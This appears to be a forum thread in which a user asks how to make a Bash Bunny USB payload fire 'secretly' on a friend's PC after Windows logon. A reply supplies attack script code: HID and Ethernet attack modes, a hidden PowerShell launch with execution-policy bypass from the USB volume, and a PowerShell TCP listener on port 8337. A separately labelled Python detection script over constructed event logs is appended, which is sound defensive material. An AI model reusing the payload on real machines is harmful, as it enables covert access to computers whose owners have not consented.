EthanL Posted January 26, 2020

Is there a way I could make the payload only run after Windows logon happens?
kuyaya Posted January 26, 2020

Hmm, you mean you want to brute force the login and then fire the payload? Or do you want to secretly plug in the bunny and wait for your friend to log in and then fire the payload? Tbh, I dunno how to do that, but I'm sure that there is a way.
EthanL (Author) Posted January 26, 2020

To plug it in and wait for my friend to log in to Windows.
TheAge Posted March 16, 2020

You could set attackmodes to HID and Ethernet and have a payload that opens something you can connect to. While you can't connect, you wait.

Not tested code (payload.txt):

    LED SETUP
    ATTACKMODE HID STORAGE RNDIS_ETHERNET 0xF000/0xFF02
    GET SWITCH_POSITION
    GET TARGET_IP

    # Wait till connection to socket server was possible (here it waits that the user logs in)
    while ! nc -G 2 -z $TARGET_IP 8337; do
        sleep 0.1
        # Try to start socket server on client
        RUN WIN powershell -windowstyle hidden -ep bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\server.ps1')"
    done

    LED ATTACK
    # Looks like user is logged in, start your payload:
    ATTACKMODE HID

    LED FINISH

server.ps1:

    # Listen on TCP port 8337 on all interfaces
    $ep = new-object System.Net.IPEndPoint ([system.net.ipaddress]::any, 8337)
    $listener = new-object System.Net.Sockets.TcpListener $ep
    $listener.start()
    # Block until one client connects
    $client = $listener.AcceptTcpClient()
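Seen from the defending side, the launcher in the post above leaves two traces on the host: a PowerShell process started with a hidden window and execution-policy bypass that resolves its script from a volume label, and that same process accepting an inbound connection on TCP 8337. The following is an added example, not code from any poster in this thread; the event records are constructed and their field names (`event_id`, `pid`, `image`, `command_line`, `initiated`, `dest_port`) are assumptions loosely modelled on Sysmon process-creation and network-connection events.

```python
import re

# Constructed sample events (not real logs); field names are assumptions.
EVENTS = [
    {"event_id": 1, "pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"""powershell -windowstyle hidden -ep bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\server.ps1')" """},
    {"event_id": 3, "pid": 4120, "initiated": False, "dest_port": 8337, "source_ip": "192.0.2.1"},
    {"event_id": 1, "pid": 5000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -File C:\Scripts\backup.ps1"},
    {"event_id": 3, "pid": 5000, "initiated": True, "dest_port": 443, "source_ip": "192.0.2.20"},
    {"event_id": 1, "pid": 6001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -ep bypass -File C:\Scripts\inventory.ps1"},
]

# Command-line traits of the launcher shown in the thread. PowerShell accepts
# abbreviated parameter names, so the patterns match prefixes as well.
RULES = {
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(ep|ex\w*)\s+bypass", re.I),
    "script_from_labelled_volume": re.compile(r"win32_volume.*label=", re.I),
}

def detect(events, min_hits=2):
    """Return {pid: sorted reasons} for PowerShell processes matching the launcher pattern."""
    hits = {}
    for ev in events:
        if ev["event_id"] == 1 and ev["image"].lower().endswith("powershell.exe"):
            reasons = {name for name, rx in RULES.items() if rx.search(ev["command_line"])}
            # One trait alone (e.g. only -ep bypass) is common in admin scripts.
            if len(reasons) >= min_hits:
                hits[ev["pid"]] = reasons
    # Correlate: a flagged PowerShell that also accepted an inbound TCP connection.
    for ev in events:
        if ev["event_id"] == 3 and ev["pid"] in hits and not ev["initiated"]:
            hits[ev["pid"]].add(f"inbound_tcp_{ev['dest_port']}")
    return {pid: sorted(r) for pid, r in hits.items()}

if __name__ == "__main__":
    for pid, reasons in detect(EVENTS).items():
        print(pid, ", ".join(reasons))
```
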